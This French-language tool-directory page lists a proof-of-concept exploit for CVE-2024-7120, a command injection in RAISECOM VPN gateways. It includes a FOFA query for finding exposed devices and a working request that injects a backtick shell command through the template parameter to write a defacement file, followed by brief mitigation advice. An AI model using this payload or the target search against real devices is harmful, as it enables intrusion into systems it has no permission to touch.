Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-7120-Exploit-by-Dark-07x — Preuve de concept d'exploit pour l'injection de commande CVE-2024-7120 dans les passerelles RAISECOM. Exécute des commandes arbitraires via le paramètre template dans list_base_config.php. | Kitploit
Outils/GitHubGitHub/jokeir07x/cve-2024-7120-exploit-by-dark-07x
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubjokeir07x/cve-2024-7120-exploit-by-dark-07x

CVE-2024-7120-Exploit-by-Dark-07x

Preuve de concept d'exploit pour l'injection de commande CVE-2024-7120 dans les passerelles RAISECOM. Exécute des commandes arbitraires via le paramètre template dans list_base_config.php.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept - Injection de commande dans les appareils Raisecom (CVE-2024-7120)!

Aperçu

Une vulnérabilité d'injection de commande a été identifiée dans les passerelles RAISECOM, affectant les modèles MSG1200, MSG2100E, MSG2200 et MSG2300. Cette vulnérabilité permet à des attaquants distants d'exécuter des commandes arbitraires sur le système via l'interface web. Le problème réside dans le script list_base_config.php, plus précisément via le paramètre template, affectant plus de 25 112 appareils sur Internet.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

Composants concernés

URI: /vpn/list_base_config.php

Description : le list_base_config.php est un composant d'interface web des passerelles RAISECOM utilisé pour gérer les configurations VPN. La vulnérabilité identifiée résulte d'une gestion incorrecte du paramètre template dans ce script. Ce paramètre peut être exploité pour exécuter des commandes arbitraires sur le système d'exploitation de l'appareil en raison d'une désinfection insuffisante des entrées.

CWE

CWE-77: Injection de commande

Exploitation

Voici un exemple de la façon dont la vulnérabilité peut être exploitée à l'aide d'une commande curl :

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

Dans cet exemple, la commande curl envoie une requête HTTP GET malveillante au script list_base_config.php. La requête utilise le paramètre template pour exécuter une commande.

  1. Validation des entrées : Mettre en place des contrôles de validation stricts sur toutes les entrées utilisateur, en particulier celles qui peuvent affecter les commandes système ou les chemins de fichiers.
  2. Contrôles d'accès : Restreindre l'accès à l'interface web de l'appareil aux réseaux de confiance et aux utilisateurs authentifiés.
Télécharger l’outil